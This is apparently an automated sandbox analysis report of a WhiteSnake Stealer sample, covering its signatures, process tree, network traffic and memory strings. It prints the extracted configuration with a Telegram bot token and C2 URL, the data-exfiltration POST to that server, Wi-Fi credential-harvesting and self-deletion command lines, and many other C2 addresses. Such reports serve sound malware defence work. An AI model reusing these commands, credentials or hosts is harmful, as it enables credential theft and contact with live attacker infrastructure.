Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1550646
MD5:cd0da55aa7811e92f71088f57df9a493
SHA1:a9430383ea4500243858a74d51bc4dcb5eda23c2
SHA256:0d503ceee2af7760bc677a71274ed2ba2c0b7d746f48fb816e091a7c92c55862
Tags:exeuser-Bitsight
Infos:

Detection

WhiteSnake Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Sigma detected: Capture Wi-Fi password
Suricata IDS alerts for network traffic
Yara detected WhiteSnake Stealer
.NET source code contains very large strings
.NET source code references suspicious native API functions
AI detected suspicious sample
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for sample
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Self deletion via cmd or bat file
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses netsh to modify the Windows network and firewall settings
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Communication To Uncommon Destination Ports
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • file.exe (PID: 3144 cmdline: "C:\Users\user\Desktop\file.exe" MD5: CD0DA55AA7811E92F71088F57DF9A493)
    • cmd.exe (PID: 4296 cmdline: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 3716 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • netsh.exe (PID: 6604 cmdline: netsh wlan show profiles MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • findstr.exe (PID: 1020 cmdline: findstr /R /C:"[ ]:[ ]" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • cmd.exe (PID: 5832 cmdline: "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 1532 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • netsh.exe (PID: 5148 cmdline: netsh wlan show networks mode=bssid MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • findstr.exe (PID: 3180 cmdline: findstr "SSID BSSID Signal" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • cmd.exe (PID: 6500 cmdline: "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && DEL /F /S /Q /A "C:\Users\user\Desktop\file.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 1480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 6764 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • timeout.exe (PID: 7156 cmdline: timeout /t 3 MD5: 100065E21CFBBDE57CBA2838921F84D6)
  • cleanup
{"Version": "1.6.3.4", "Telegram Token": "7628354786:AAG5ULd2m-BqZfqQURreSGmnSGl-Y4hCa4c", "Telegram chatid": "7470447426", "C2 urls": ["http://91.223.3.164:8080"]}
SourceRuleDescriptionAuthorStrings
Process Memory Space: file.exe PID: 3144JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    Process Memory Space: file.exe PID: 3144JoeSecurity_WhiteSnakeYara detected WhiteSnake StealerJoe Security

      System Summary

      barindex
      Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]", CommandLine: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 3144, ParentProcessName: file.exe, ProcessCommandLine: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]", ProcessId: 4296, ProcessName: cmd.exe
      Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]", CommandLine: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 3144, ParentProcessName: file.exe, ProcessCommandLine: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]", ProcessId: 4296, ProcessName: cmd.exe
      Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 91.223.3.164, DestinationIsIpv6: false, DestinationPort: 8080, EventID: 3, Image: C:\Users\user\Desktop\file.exe, Initiated: true, ProcessId: 3144, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49705

      Stealing of Sensitive Information

      barindex
      Source: Process startedAuthor: Joe Security: Data: Command: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]", CommandLine: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 3144, ParentProcessName: file.exe, ProcessCommandLine: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]", ProcessId: 4296, ProcessName: cmd.exe
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-11-07T00:07:00.914550+010020506021A Network Trojan was detected192.168.2.54970591.223.3.1648080TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-11-07T00:07:00.855825+010020506011A Network Trojan was detected192.168.2.54970591.223.3.1648080TCP

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: file.exeAvira: detected
      Source: 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: WhiteSnake {"Version": "1.6.3.4", "Telegram Token": "7628354786:AAG5ULd2m-BqZfqQURreSGmnSGl-Y4hCa4c", "Telegram chatid": "7470447426", "C2 urls": ["http://91.223.3.164:8080"]}
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
      Source: file.exeJoe Sandbox ML: detected
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF848E67BB1 CryptUnprotectData,0_2_00007FF848E67BB1
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF848E67CFD CryptUnprotectData,0_2_00007FF848E67CFD
      Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then dec eax0_2_00007FF848E661C0
      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp 00007FF848E6D71Ah0_2_00007FF848E6D4C1
      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp 00007FF848E6CF5Eh0_2_00007FF848E6AD9E
      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp 00007FF848E6C506h0_2_00007FF848E6BDF8
      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then dec eax0_2_00007FF848E710FF
      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp 00007FF848E6CF5Eh0_2_00007FF848E6CB76
      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp 00007FF848E66E2Ch0_2_00007FF848E66C29
      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp 00007FF848E6EFEDh0_2_00007FF848E6EEE9
      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp 00007FF848E6CF5Eh0_2_00007FF848E6C68F
      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp 00007FF848E7301Ah0_2_00007FF848E72FA3
      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then dec eax0_2_00007FF848E6CF36

      Networking

      barindex
      Source: Network trafficSuricata IDS: 2050601 - Severity 1 - ET MALWARE [ANY.RUN] WhiteSnake Stealer HTTP Request : 192.168.2.5:49705 -> 91.223.3.164:8080
      Source: Network trafficSuricata IDS: 2050602 - Severity 1 - ET MALWARE [ANY.RUN] WhiteSnake Stealer HTTP POST Report Exfiltration : 192.168.2.5:49705 -> 91.223.3.164:8080
      Source: global trafficTCP traffic: 192.168.2.5:49705 -> 91.223.3.164:8080
      Source: global trafficHTTP traffic detected: GET /line?fields=query,country HTTP/1.1Host: ip-api.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: POST /sendData?pk=OTVCRjJBMjUwMjY3RDQzMkU5RkNCQ0Q1OURFQzA5QTk=&ta=RGVmYXVsdA==&un=YWxmb25z&pc=MTM4NzI3&co=VW5pdGVkIFN0YXRlcw==&wa=MA==&be=MA== HTTP/1.1Host: 91.223.3.164:8080Content-Length: 148982Expect: 100-continueConnection: Keep-Alive
      Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
      Source: Joe Sandbox ViewASN Name: PL-SKYTECH-ASPL PL-SKYTECH-ASPL
      Source: unknownDNS query: name: ip-api.com
      Source: unknownTCP traffic detected without corresponding DNS query: 91.223.3.164
      Source: unknownTCP traffic detected without corresponding DNS query: 91.223.3.164
      Source: unknownTCP traffic detected without corresponding DNS query: 91.223.3.164
      Source: unknownTCP traffic detected without corresponding DNS query: 91.223.3.164
      Source: unknownTCP traffic detected without corresponding DNS query: 91.223.3.164
      Source: unknownTCP traffic detected without corresponding DNS query: 91.223.3.164
      Source: unknownTCP traffic detected without corresponding DNS query: 91.223.3.164
      Source: unknownTCP traffic detected without corresponding DNS query: 91.223.3.164
      Source: unknownTCP traffic detected without corresponding DNS query: 91.223.3.164
      Source: unknownTCP traffic detected without corresponding DNS query: 91.223.3.164
      Source: unknownTCP traffic detected without corresponding DNS query: 91.223.3.164
      Source: unknownTCP traffic detected without corresponding DNS query: 91.223.3.164
      Source: unknownTCP traffic detected without corresponding DNS query: 91.223.3.164
      Source: unknownTCP traffic detected without corresponding DNS query: 91.223.3.164
      Source: unknownTCP traffic detected without corresponding DNS query: 91.223.3.164
      Source: unknownTCP traffic detected without corresponding DNS query: 91.223.3.164
      Source: unknownTCP traffic detected without corresponding DNS query: 91.223.3.164
      Source: unknownTCP traffic detected without corresponding DNS query: 91.223.3.164
      Source: unknownTCP traffic detected without corresponding DNS query: 91.223.3.164
      Source: unknownTCP traffic detected without corresponding DNS query: 91.223.3.164
      Source: unknownTCP traffic detected without corresponding DNS query: 91.223.3.164
      Source: unknownTCP traffic detected without corresponding DNS query: 91.223.3.164
      Source: unknownTCP traffic detected without corresponding DNS query: 91.223.3.164
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /line?fields=query,country HTTP/1.1Host: ip-api.comConnection: Keep-Alive
      Source: global trafficDNS traffic detected: DNS query: ip-api.com
      Source: unknownHTTP traffic detected: POST /sendData?pk=OTVCRjJBMjUwMjY3RDQzMkU5RkNCQ0Q1OURFQzA5QTk=&ta=RGVmYXVsdA==&un=YWxmb25z&pc=MTM4NzI3&co=VW5pdGVkIFN0YXRlcw==&wa=MA==&be=MA== HTTP/1.1Host: 91.223.3.164:8080Content-Length: 148982Expect: 100-continueConnection: Keep-Alive
      Source: file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://101.126.19.171:80
      Source: file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://101.132.223.26:8080
      Source: file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://101.43.160.136:8080
      Source: file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.161.20.142:8080
      Source: file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.202.101.219:8080
      Source: file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://129.151.109.160:8080
      Source: file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.203.174.113:8090
      Source: file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.99.138.249:8080
      Source: file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://168.138.211.88:8099
      Source: file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://18.228.80.130:80
      Source: file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.217.98.121:80
      Source: file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.217.98.121:8080
      Source: file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.164.198.113:8080
      Source: file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://206.166.251.4:8080
      Source: file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://206.189.109.146:80
      Source: file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.60.191.38:80
      Source: file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.87.207.180:9090
      Source: file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.82.65.63:80
      Source: file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.4.73.118:9000
      Source: file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.110.140.182:8080
      Source: file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.96.78.224:8080
      Source: file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.42.56.128:80
      Source: file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.134.71.132:8082
      Source: file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.219.110.16:9999
      Source: file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2074990140.000002060012F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.223.3.164:8080
      Source: file.exe, 00000000.00000002.2074990140.000002060012F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.223.3.164:8080/sendData
      Source: file.exe, 00000000.00000002.2074990140.000002060012F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.223.3.164:8080/sendData?pk=OTVCRjJBMjUwMjY3RDQzMkU5RkNCQ0Q1OURFQzA5QTk=&ta=RGVmYXVsdA==&un
      Source: file.exe, 00000000.00000002.2074990140.000002060012F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.223.3.164:80802
      Source: file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.216.147.179:80
      Source: file.exe, 00000000.00000002.2074990140.00000206000BD000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2074990140.00000206000DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
      Source: file.exe, 00000000.00000002.2074990140.00000206000BD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line?fields=query
      Source: file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
      Source: file.exe, 00000000.00000002.2074990140.00000206000BD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
      Source: file.exe, 00000000.00000002.2074990140.00000206001E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.w3.or
      Source: file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://101.126.19.171:443
      Source: file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://138.2.92.67:443
      Source: file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://154.9.207.142:443
      Source: file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://192.99.196.191:443
      Source: file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://44.228.161.50:443
      Source: file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://5.196.181.135:443
      Source: file.exe, 00000000.00000002.2078691178.0000020610930000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
      Source: file.exe, 00000000.00000002.2078691178.0000020610930000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
      Source: file.exe, 00000000.00000002.2078691178.0000020610930000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
      Source: file.exe, 00000000.00000002.2078691178.0000020610930000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
      Source: file.exe, 00000000.00000002.2078691178.0000020610930000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
      Source: file.exe, 00000000.00000002.2078691178.0000020610930000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
      Source: file.exe, 00000000.00000002.2078691178.0000020610930000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
      Source: file.exe, 00000000.00000002.2078691178.000002061014A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2078691178.0000020610152000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
      Source: file.exe, 00000000.00000002.2078691178.000002061015A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
      Source: file.exe, 00000000.00000002.2078691178.000002061015A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
      Source: file.exe, 00000000.00000002.2078691178.0000020610930000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
      Source: file.exe, 00000000.00000002.2078691178.0000020610930000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
      Source: file.exe, 00000000.00000002.2078691178.000002061014A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2078691178.0000020610152000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
      Source: file.exe, 00000000.00000002.2078691178.000002061015A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
      Source: file.exe, 00000000.00000002.2078691178.000002061015A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
      Source: file.exe, 00000000.00000002.2078691178.000002061015A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
      Source: file.exe, 00000000.00000002.2078691178.000002061015A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
      Source: file.exe, 00000000.00000002.2078691178.000002061015A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
      Source: file.exe, 00000000.00000002.2078691178.000002061015A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

      System Summary

      barindex
      Source: file.exe, m1B6vc.csLong String: Length: 11394
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF848E629530_2_00007FF848E62953
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF848E674150_2_00007FF848E67415
      Source: file.exe, 00000000.00000002.2084259666.000002067C0B6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs file.exe
      Source: file.exe, 00000000.00000000.2023939236.000002067BEA2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamer3cb3a7a4c0bd9460d9b130.exeh$ vs file.exe
      Source: file.exeBinary or memory string: OriginalFilenamer3cb3a7a4c0bd9460d9b130.exeh$ vs file.exe
      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@26/3@1/2
      Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\nb3ruhpgaoJump to behavior
      Source: C:\Users\user\Desktop\file.exeMutant created: \Sessions\1\BaseNamedObjects\jv3vebus8g
      Source: C:\Users\user\Desktop\file.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1480:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6132:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6784:120:WilError_03
      Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: file.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
      Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: file.exe, 00000000.00000002.2074990140.000002060007F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2074990140.00000206003D4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2074990140.0000020600094000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
      Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /R /C:"[ ]:[ ]"
      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr "SSID BSSID Signal"
      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && DEL /F /S /Q /A "C:\Users\user\Desktop\file.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 3
      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"Jump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"Jump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && DEL /F /S /Q /A "C:\Users\user\Desktop\file.exe"Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profilesJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /R /C:"[ ]:[ ]"Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssidJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr "SSID BSSID Signal"Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 3Jump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
